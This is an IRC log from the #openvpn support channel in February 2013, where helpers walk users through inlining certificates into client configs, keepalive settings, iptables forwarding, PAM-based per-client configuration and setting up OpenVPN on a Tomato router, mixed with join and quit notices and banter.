08:45 < EugeneKay> Are you the "Gaga prince", or are you instructing us to "gag a prince" ?
08:45 < EugeneKay> Either one is hilarious
08:46 * gagaprince slaps EugeneKay around a bit with a large trout
08:46 < funyun> 09:44 < gagaprince> embed everything into the ovpn file, are you saying to put all config lines into the client.ovpn file?
08:46 < EugeneKay> What? It's a legitimate question
08:46 < rob0> My daughter had a puppy she thought was mail, and named it Prince.
I saw it and noticed that it was female, so I called it "the puppy formerly known as Prince."
08:47 < rob0> s/mail/male/ duh
08:47 < EugeneKay> male mail man
08:49 <@plaisthos> funyun: see the !inline description
08:49 < rob0> then we just called it "Prints" because she made messes with paw prints ... worked out okay.
08:51 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 255 seconds]
08:51 < funyun> plaisthos: i might as well be reading spanish. this is what i gather from that but i'm probably wrong.. i need to combine all of these into one file? if that's what it means, how do i handle the 2 crt files?
08:52 <@plaisthos> funyun: it is very simple
08:52 < funyun> plaisthos: not to a retard like me
08:52 <@plaisthos> if there is ca foo.crt in your config you replace it with
08:52 <@plaisthos> <ca>
08:52 <@plaisthos> [content of foo.crt]
08:52 <@plaisthos> </ca>
08:53 <@plaisthos> and do so for key, cert too
08:53 < funyun> plaisthos: okay. do i add for the second crt file? or just ca?
08:53 -!- erry [erry@freenode/staff/erry] has quit [Read error: Connection reset by peer]
08:54 <@plaisthos> funyun: do you have two ca file.crt in your original configuration?
08:54 <@plaisthos> or one that says ca cert1.crt and another that says cert cert2.crt?
08:55 < funyun> plaisthos: yep. these are the files i have. "ca.crt client.ovpn client1.crt client1.key"
08:59 <@plaisthos> now go and edit your client.ovpn
09:00 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
09:02 < funyun> plaisthos: i think i may have found the problem, my crt file doesn't begin with "-----BEGIN CERTIFICATE-----". it begins with "Certificate:"
09:02 < funyun> plaisthos: there is a ton of encryption stuff before it gets to "-----BEGIN CERTIFICATE-----"
09:03 < funyun> algorithms and things. "Signature Algorithm: sha1WithRSAEncryption"
09:03 < funyun> could that be the problem?
09:03 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection]
09:04 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
09:06 <@plaisthos> funyun: should not be
09:06 <@plaisthos> openvpn will ignore everything else
09:07 < funyun> plaisthos: so do i not add that stuff and just add the part with -----BEGIN CERTIFICATE-----?
09:08 <@plaisthos> funyun: works either way
09:09 < funyun> plaisthos: okay. so do i add ?
09:10 < funyun> and if so, where do i find that info?
09:12 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 256 seconds]
09:13 <@plaisthos> funyun: you replace only the entry that is already there in your configuration
09:24 < funyun> plaisthos: i guess it was just the app. i was using the jailbroken app. but i just tried one from the app store and it worked. thank you for your help :)
09:25 -!- erry__ [erry@freenode/staff/erry] has joined #openvpn
09:33 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 255 seconds]
09:36 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds]
09:37 -!- funyun [~funyun@cpe-65-25-103-89.neo.res.rr.com] has quit [Quit: leaving]
09:43 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn
09:52 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
09:56 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds]
09:57 -!- jtrucks_ is now known as jtrucks
09:57 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
10:03 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection]
10:20 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
10:21 <@ecrist> novaflash: that is funny
10:21 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Ping timeout: 272 seconds]
10:24 -!- erry__ is now known as erry
10:26 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 256 seconds]
10:31 -!- Mimiko [~Mimiko@89.28.88.177]
has joined #openvpn 10:32 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 10:33 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 10:35 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 10:36 <@novaflash> ecrist: yep 10:36 <@novaflash> we have now shared a joke, therefore we are best friends for life 10:37 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 10:38 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 10:44 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds] 10:46 < EugeneKay> I LOVE YOU ALL WITH A GREAT HUGE LOVE 10:46 <@novaflash> not that much of a best friend though, i hope 10:51 -!- hive-mind [pranq@mail.bbis.us] has joined #openvpn 10:51 -!- hive-mind [pranq@mail.bbis.us] has quit [Changing host] 10:51 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 10:54 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Connection reset by peer] 10:55 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 10:57 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 11:01 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 255 seconds] 11:04 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 11:08 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 245 seconds] 11:10 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 11:11 -!- gagaprince [~root@94.249.242.85] has quit [] 11:15 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds] 11:31 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 11:36 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 11:37 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Read error: Connection reset by peer] 11:48 -!- brute11k 
[~brute11k@89.249.235.89] has joined #openvpn 11:57 -!- erry [erry@freenode/staff/erry] has quit [Ping timeout: 612 seconds] 12:12 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 12:17 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 244 seconds] 12:27 -!- erry [erry@freenode/staff/erry] has joined #openvpn 12:29 -!- erry [erry@freenode/staff/erry] has quit [Read error: Connection reset by peer] 12:29 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 12:29 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 12:34 -!- erry_ is now known as erry 12:37 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 252 seconds] 13:10 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 248 seconds] 13:19 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:27 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn 13:38 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 14:23 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 14:44 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 246 seconds] 15:02 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 15:11 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 15:15 -!- flashuni [~textual@50-1-20-224.dsl.static.sonic.net] has joined #openvpn 15:34 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 248 seconds] 15:43 -!- flashuni [~textual@50-1-20-224.dsl.static.sonic.net] has quit [Ping timeout: 252 seconds] 15:49 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:53 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 16:15 -!- BtbN [~btbn@btbn.de] has joined #openvpn 16:19 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 246 seconds] 
16:34 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 255 seconds] 16:39 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Read error: Connection reset by peer] 16:46 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:59 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 17:04 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 17:09 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn 17:12 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Remote host closed the connection] 17:24 -!- zz_AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 252 seconds] 17:24 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 246 seconds] 17:28 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 17:28 -!- zz_AsadH is now known as AsadH 17:28 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 17:28 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 17:31 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 17:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds] 17:40 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 17:40 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:55 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 18:13 -!- erry [erry@freenode/staff/erry] has quit [Quit: Segmentation fault] 18:19 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 240 seconds] 18:25 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 276 seconds] 18:32 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 18:32 -!- erry_ is now known as erry 18:32 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 18:49 -!- knobo [~bohmer@81.175.44.217] has joined #openvpn 18:55 < knobo> I run a tunnel with autossh and pppd, Then I have a 
script that checks if the tunnel is up. If it is not up, I restart it. Do I need to do that with openvpn too, or does it "just work"? 18:55 < pekster> You want: 18:55 < pekster> !keepalive 18:55 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 18:56 < knobo> thanx 18:57 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 244 seconds] 19:00 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 19:03 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 19:07 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 19:10 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 19:19 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 19:22 -!- knobo [~bohmer@81.175.44.217] has quit [Ping timeout: 256 seconds] 19:43 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 19:50 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds] 20:01 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 20:04 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn 20:21 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 21:06 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 248 seconds] 21:45 -!- mnathani [~mnathani@198.84.231.11] has joined #openvpn 22:10 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds] 23:04 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds] 23:22 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has 
quit [Ping timeout: 240 seconds] 23:23 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has joined #openvpn 23:47 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 245 seconds] 23:57 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn --- Day changed Sun Feb 10 2013 00:27 -!- yavor [~yavor@78.128.23.17] has joined #openvpn 00:36 -!- yavor [~yavor@78.128.23.17] has quit [Ping timeout: 248 seconds] 01:41 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- The professional IRC Client :D] 01:41 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 01:45 -!- yavor [~yavor@78.128.23.17] has joined #openvpn 01:48 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 01:52 -!- yavor [~yavor@78.128.23.17] has quit [Ping timeout: 248 seconds] 02:16 -!- tyteen4a03 [~T4@n218250226180.netvigator.com] has quit [Read error: Connection reset by peer] 02:16 -!- yavor [~yavor@78.128.23.17] has joined #openvpn 02:17 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has joined #openvpn 02:56 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 02:56 -!- Devastator [~devas@unaffiliated/devastator] has left #openvpn [] 02:56 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 03:10 -!- yavor [~yavor@78.128.23.17] has quit [Ping timeout: 248 seconds] 03:21 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Quit: Konversation terminated!] 
03:34 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 03:38 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 04:13 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 04:22 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has joined #openvpn 04:23 -!- catsup [~d@64.111.123.163] has quit [Remote host closed the connection] 04:27 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has quit [] 04:27 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has joined #openvpn 04:32 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has quit [Ping timeout: 256 seconds] 04:38 -!- hid3 [~arnoldas@78.157.71.116] has left #openvpn [] 04:41 -!- Devastator [~devas@unaffiliated/devastator] has quit [] 04:48 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has joined #openvpn 05:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 05:19 -!- ade_b [~Ade@koln-5d817611.pool.mediaWays.net] has joined #openvpn 05:19 -!- ade_b [~Ade@koln-5d817611.pool.mediaWays.net] has quit [Changing host] 05:19 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:23 -!- simplechat [~simplecha@ppp121-44-207-224.lns20.syd7.internode.on.net] has joined #openvpn 05:23 -!- simplechat [~simplecha@ppp121-44-207-224.lns20.syd7.internode.on.net] has quit [Changing host] 05:23 -!- simplechat [~simplecha@unaffiliated/simplechat] has joined #openvpn 05:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:44 -!- simplechat [~simplecha@unaffiliated/simplechat] has quit [Read error: Connection reset by peer] 05:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 05:53 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:54 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has quit [Ping 
timeout: 272 seconds] 06:25 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 252 seconds] 06:30 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 06:30 -!- mode/#openvpn [+v s7r] by ChanServ 06:33 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 06:48 -!- yuri__ [~cek@78.26.128.206] has joined #openvpn 06:57 -!- yuri__ [~cek@78.26.128.206] has quit [Ping timeout: 256 seconds] 07:02 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has quit [Read error: Connection reset by peer] 07:02 -!- tyteen4a03 [~T4@n218250226180.netvigator.com] has joined #openvpn 07:03 -!- tyteen4a03 [~T4@n218250226180.netvigator.com] has quit [Read error: Connection reset by peer] 07:03 -!- master_of_master [~master_of@p57B5480E.dip.t-dialin.net] has quit [Ping timeout: 246 seconds] 07:04 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 244 seconds] 07:05 -!- master_of_master [~master_of@p57B547BB.dip.t-dialin.net] has joined #openvpn 07:05 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 07:10 -!- yuri__ [~cek@crius.pantheon.fused.net] has joined #openvpn 07:14 -!- kunago [~Thunderbi@201.239.broadband12.iol.cz] has joined #openvpn 07:16 < kunago> Hello guys. I need to consult some iptables guru who could give me a hint why I am unable to ping clients connected directly to my VPN while I am able to ping clients on other subnets. This picture might give an idea of what I am trying to do: http://s.kunago.com/2013-02-10_14-14-21.jpg 07:18 < kunago> I am not using "client-to-client" and am trying to fine tune the access for each client manually. I was able to propapage clients for clients on all subnets, this works fine with the FORWARD table of iptables but not with the VPN IP range. There I am unable to reach each client. 07:20 < kunago> iptables rules such as "iptables -A FORWARD -s 192.168.10.0/24 -d 192.168.10.0/24 -j ACCEPT" do not seem to make any difference. 
07:20 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has joined #openvpn 07:21 -!- Orbi [~opera@109.129.3.216] has joined #openvpn 07:25 -!- Orbi [~opera@109.129.3.216] has quit [Read error: Connection reset by peer] 07:31 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 07:31 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving] 07:47 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in] 07:49 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 07:58 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 07:59 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 08:07 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"] 08:08 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has quit [Ping timeout: 248 seconds] 08:09 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 08:10 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has joined #openvpn 08:12 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has quit [Read error: Operation timed out] 08:16 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 08:19 -!- yuri__ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 256 seconds] 08:34 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:51 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 08:52 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 08:57 -!- LordDoskias [~chichiman@unaffiliated/lorddoskias] has joined #openvpn 08:57 < LordDoskias> hello, i have an openvpn set up to use PAM auth via username/password i was wondering whether openvpn supports per-client configuration when used in that mode? 
I know it supports it if i use client certificates but does it do it when used with PAM 08:58 < EugeneKay> --username-as-common-name should do what you want 09:02 -!- Ahti333 [~Ahti333@cronosx.de] has joined #openvpn 09:03 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 09:03 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 09:09 < LordDoskias> so i did what you recommended and here is my server.conf http://pastie.org/private/uzmnfhl5fij7kxfzr4cp2a 09:09 < LordDoskias> i created a 'ccd' dir under /etc/openvpn and in it created a file called 'goon' becuaase the user that is going to auth is called 'goon', but now my openvpn server doesn't want to start 09:10 < LordDoskias> this is my version of openvpn: Version: 2.2.1-3~bpo60+1 09:11 < rob0> are the logs in that paste? 09:11 < LordDoskias> nope i cannot seem to get the logs 09:12 < LordDoskias> because it is failing on start up 09:12 < rob0> I guess you should address that issue first. 09:12 < LordDoskias> how? 09:13 < LordDoskias> when i run openvpn --daemon --config server.conf nothing gets printedon the screen 09:14 < rob0> do you know what --daemon does? 09:14 < LordDoskias> runs it in background as a service 09:14 < rob0> ... and sends logs to ... 09:14 < LordDoskias> but even without it still doesn't print anything on the screen 09:18 < LordDoskias> where does it print its errors? 09:18 < LordDoskias> or any output for that matter 09:19 -!- b1rkh0ff [~b1rkh0ff@178.77.24.133] has joined #openvpn 09:19 < LordDoskias> during start up that is, because it is not in the file set in the server.conf 09:21 < LordDoskias> okay, found it :) 09:22 < LordDoskias> it says it is because auth-user-pass-verify is missing but i'm using the pam module 09:25 -!- xbanux [~xbanux@59.182.148.220] has joined #openvpn 09:26 < LordDoskias> isn't it a bit idiosincratic that username-as-common-name requires auth-user-pass-verify? 
shouldn't authenticating via pam module be supported as well? 09:27 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has quit [Quit: Leaving] 09:27 < EugeneKay> Typically the verify script handles figuring out PAM or w/e 09:38 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has joined #openvpn 09:39 -!- catsup [~d@64.111.123.163] has joined #openvpn 09:39 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Remote host closed the connection] 09:44 -!- xbanux [~xbanux@59.182.148.220] has quit [Ping timeout: 245 seconds] 09:46 < LordDoskias> if i have plugin /usr/lib/openvpn/openvpn-auth-pam.so login shouldn't username-as-common-name work as well 09:46 < LordDoskias> in this case openvpn starts and clients connect but the client-specific configuration is not executed 09:53 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 240 seconds] 09:55 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 09:57 -!- corretico [~luis@190.211.93.38] has joined #openvpn 09:57 -!- corretico [~luis@190.211.93.38] has quit [Remote host closed the connection] 09:57 -!- corretico [~luis@190.211.93.38] has joined #openvpn 09:59 -!- kunago [~Thunderbi@201.239.broadband12.iol.cz] has quit [Remote host closed the connection] 10:09 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has joined #openvpn 10:25 -!- xbanux [~xbanux@triband-mum-59.182.148.220.mtnl.net.in] has joined #openvpn 10:27 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has quit [Quit: leaving] 10:41 < LordDoskias> so i set up the authentication to work with the provided perl script, however, my client specific settings aren't pushed 10:53 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 10:53 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 11:03 < LordDoskias> so here is my server.log ccd/goon and log of when the client has connected: 
http://pastie.org/private/vvwlxw87cxfp9jvhjwwq 11:03 < LordDoskias> unfortunately it is not receiving the client-specific information specified in the file 11:03 < LordDoskias> the perms of the goon file is 755 so it can be read after openvpn drops root 11:10 -!- yavor [~yavor@78.128.23.17] has joined #openvpn 11:44 < pekster> LordDoskias: You may be able to get the same effect using a --client-connect script instead, and using the $username env-var 11:44 < pekster> See the section in the manpage called "SCRIPTING AND ENVIRONMENTAL VARIABLES" 11:45 < pekster> I don't know if that works, but it's worth exploring. You can also use 'set > /tmp/vars.dump' in a client-connect script to see what the envnironment does have for you to play with 11:49 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 245 seconds] 11:51 < LordDoskias> i fixed it 11:51 < LordDoskias> it rusn out that the path to the ccd dir has to be full and not relative 11:51 < pekster> Ah, k 11:52 < pekster> Running at 'verb 4' usually provides helpful clues like that 12:02 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 12:37 -!- xbanux [~xbanux@triband-mum-59.182.148.220.mtnl.net.in] has quit [Ping timeout: 248 seconds] 12:39 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 276 seconds] 12:41 -!- LordDoskias [~chichiman@unaffiliated/lorddoskias] has left #openvpn ["Leaving"] 12:43 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Connection reset by peer] 12:46 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 13:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 13:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:23 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 248 seconds] 13:25 < lickalott> all, i've generated all my keys but haven't been successful in getting the OpenVpn started. 
i've tried a different approach as a troubleshooting step but it's asking for a static key and i'm not sure which one to use. 13:27 < rob0> !goal 13:27 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 13:37 -!- bighornram [~bighornra@c-68-35-157-179.hsd1.nm.comcast.net] has joined #openvpn 13:41 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 13:41 -!- yuri__ [~cek@crius.pantheon.fused.net] has joined #openvpn 13:45 < lickalott> I would like to setup OpenVpn server on my tomato flashed router, but the configuration tut's that I'm following don't seem to work. I have been already told that I should ask in the tomato chan but they are worthless and non-responsive. I have been assisted here in the past but i was traveling down another path at that time. in an attempt to get this thing working I tried to follow another 13:45 < lickalott> tut that says set server > basic > authorization mode to static key, but I don't know which of my keys i need to throw in that box. 13:46 < rob0> A static key VPN is a peer-to-peer connection, no server nor client, just two peers only. Is that what you want? 13:47 < pekster> Didn't you have your server starting without errors yesterday? If you had problems at that point, looking that the logs on both sides should have been the next step if you were having problems 13:47 < rob0> "!goal" means just that, *clearly* state what you are trying to do here. 13:48 < lickalott> honestly I don't know. This whole thing escapes me... I have an ubuntu server running the -AS (which I was told isn't supported either) and that works fine. I'm just trying to set it up through the router. 13:48 < rob0> pekster seems to have some of the background here. so might better be able to help. 
13:48 -!- bighornram [~bighornra@c-68-35-157-179.hsd1.nm.comcast.net] has quit [Ping timeout: 256 seconds] 13:48 < rob0> !as 13:48 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 13:49 < rob0> We do not use Access-Server here. 13:49 < lickalott> yes pekster it showed started but there was no traffic and I couldn't connect to it. i tried changing ports and messing with some other settings. 13:49 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 13:49 < pekster> Well, part of it. No idea exactly what tomato is doing under the hood since it hides all that behind web configs... 13:49 < lickalott> lickalott is ~lickalott@127.0.0.1.silentkiller.cc * Nun-ya 13:49 < lickalott> lickalott on #openvpn-as 13:50 < lickalott> the inteface seems to be pretty basic, i think it's just my lack of knowledge that's preventing it from working. 13:51 < pekster> As I believe I noted yesterday, the "basic" tomato interface then turns around and runs a bunch of fairly complicated shell code to "convert" the web settings stored on the router into a command to call openvpn. Here, we support openvpn, not the web config or shell scripts that make tomato go 13:51 < lickalott> lets say that I just jumped in and said "hey guys, whats the best setup/configuration of software and hardware to get openvpn working" What would you say? i.e. whats the ideal setup 13:51 < pekster> !howto 13:51 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 13:51 < pekster> ^that^ 13:52 < lickalott> you did pekster, and I'm trying to stay away from the tomato portion and just focus on the openvpn stuff. 13:52 -!- module000 [~module000@254.sub-70-196-34.myvzw.com] has joined #openvpn 13:52 < pekster> Tomato should be able to run the 'openvpn' command without any tomato web config or initsscripts at all. 
Of course, it won't auto-start on boot unless you design your own startup code, but that's often good for learning too, if you want to really understand how it all works 13:53 < rob0> Alice: Would you tell me, please, which way I ought to go from here? 13:53 < rob0> The Cat: That depends a good deal on where you want to get to 13:53 < pekster> :) 13:53 < lickalott> lol 13:54 < lickalott> i would like to take the ubuntu server out of the picture, in regard to openvpn and run it strictly from the router. <-- thats #1. #2 would be to have the server set up as the CA so i'm not generating keys on the router. however, I will settle for #1 right now. 13:55 < pekster> easy-rsa is completely separate from openvpn; you can run easy-rsa on whatever system you want 13:55 < pekster> Just keep doing the key/PKI tasks on the server and send keys/certs to the router 13:55 < rob0> The proper way to run a CA is for clients to generate their own keys and CSRs, then the CA signs them. 13:55 < pekster> Yes, except with embedded hardware that has really awful entropy 13:56 < 